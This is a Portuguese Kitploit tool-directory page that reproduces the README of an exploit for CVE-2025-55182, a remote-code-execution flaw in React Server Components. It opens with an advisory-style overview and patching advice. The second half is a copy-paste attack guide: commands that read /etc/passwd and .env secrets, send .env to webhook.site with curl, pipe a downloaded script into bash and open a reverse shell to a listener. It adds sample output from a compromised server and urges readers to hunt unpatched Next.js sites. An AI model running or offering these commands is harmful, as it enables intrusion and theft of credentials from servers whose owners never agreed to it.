Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/shen771/blackash-cve-2025-55182
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubshen771/blackash-cve-2025-55182
303há 9 mesesAinda não revisado

Blackash-CVE-2025-55182

CVE-2025-55182

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-55182 — Vulnerabilidade Crítica do Servidor React

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 O Que É

  • ⚛️ Uma falha crítica de segurança nos Componentes de Servidor React (RSC)
  • 🧨 Causada por desserialização insegura
  • 🌐 Explorável através de requisições de rede
  • 🔓 Nenhuma autenticação necessária
  • ☠️ Pode levar à Execução Remota de Código (RCE)

✅ Isso significa que atacantes poderiam potencialmente executar código arbitrário do lado do servidor com uma única requisição maliciosa.


📊 Gravidade

  • 🔴 Pontuação CVSS: 10.0 (Crítica)
  • 🏴‍☠️ Complexidade do Ataque: Baixa
  • 🔑 Privilégios Necessários: Nenhum
  • 👤 Interação do Usuário: Nenhuma
  • 💥 Impacto: Possível comprometimento total do sistema

📦 Tecnologias Afetadas

⚠️ Sistemas que usam Componentes de Servidor React, incluindo:

  • ✅ Pacotes DOM do servidor React
  • ✅ Frameworks que empacotam RSC, como:
    • Next.js (App Router + RSC)
Baixar ferramenta
  • Plugins Vite RSC
  • Ferramentas Parcel RSC
  • Redwood, Waku, etc.
  • ❌ Não afetados:

    • Aplicativos React puramente do lado do cliente
    • Aplicativos que NÃO usam Componentes de Servidor

    🔥 Por Que Isso É Perigoso

    • 🧑‍💻 Atacantes podem executar comandos no seu servidor
    • 🗃️ Potencial para roubar bancos de dados e segredos
    • 🦠 Pode ser usado para implantar ransomware ou backdoors
    • 🔄 Pode permitir movimentação lateral pela infraestrutura
    • 🚀 Explorável em escala

    🛠️ O Que Fazer Imediatamente

    ✅ 1. Corrigir e Atualizar

    • ⬆️ Atualize o React para versões corrigidas
    • ⬆️ Atualize o Next.js ou qualquer framework baseado em RSC

    ✅ 2. Auditoria de Dependências

    • 🔍 Varra por pacotes vulneráveis transitivos
    • 🧾 Use:
      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. Proteção Temporária (Não é uma Correção Completa)

    • 🛡️ Regras de WAF
    • 🔐 Filtros de validação de requisições
    • 🚫 Bloqueie payloads suspeitos

    ⚠️ Isso apenas reduz o risco — NÃO substitui a correção


    👥 Quem Deveria Se Preocupar?

    • ✅ Desenvolvedores full-stack que usam Next.js App Router
    • ✅ Equipes de DevOps que hospedam aplicativos React SSR
    • ✅ Engenheiros de segurança monitorando:
      • Serviços web Node.js
      • Runtimes de borda
      • Aplicativos SSR serverless

    📌 Conclusão Principal

    🚨 Se seu aplicativo usa Componentes de Servidor React e não está corrigido — ele está potencialmente totalmente comprometido agora.


    🚨 Aqui estão todos os comandos rápidos que você vai precisar (copie e cole → resultado instantâneo):

    CVE-2025-55182.py (RCE básico)

    root@kitploit:~
    # Basic info
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Read files
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Exfiltrate
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Download & run (if wget/curl exists)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (shell reverso instantâneo)

    root@kitploit:~
    # 1. Start listener (once)
    nc -lvnp 4444
    
    # 2. Fire → shell in <3 seconds
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Isso é literalmente tudo.
    Dois scripts, esses 8 comandos → comprometimento total em qualquer site Next.js não corrigido hoje.
    Vá atrás dessas recompensas.

    Aqui está exatamente o que você verá em tempo real quando o exploit funcionar (alvo 100% não corrigido, 3 de dezembro de 2025):

    1. Quando você executa o script RCE normal (CVE-2025-55182.py)
    Você digita:

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    Você vê instantaneamente na sua tela:

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → Esse “node” (ou o que o comando retornar) é a saída real do servidor vítima.
    Se você executar id, verá as linhas completas de uid/gid, etc.

    2. Quando você executa o script de shell reverso (CVE-2025-55182-revshell.py)
    Você digita:

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Você vê instantaneamente no seu terminal de escuta:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → Shell TTY interativo completo como o usuário node (quase sempre o usuário da aplicação web). Você domina a máquina.

    Isso é literalmente tudo.
    Se você vir algo do acima → exploit funcionou 100%.
    Se você receber apenas HTTP 403/404 ou nada → já corrigido ou bloqueado por WAF.

    Vá caçar.


    aviso legal

    Esta PoC é apenas para testes de segurança autorizados e uso educacional.
    Não a execute contra qualquer sistema que você não possua ou para o qual não tenha permissão explícita por escrito para testar.
    O uso não autorizado é ilegal e pode resultar em processo criminal.
    Use apenas em seu laboratório, programas de bug bounty com escopo claro ou alvos que lhe deram permissão.

    Você é 100% responsável por suas ações.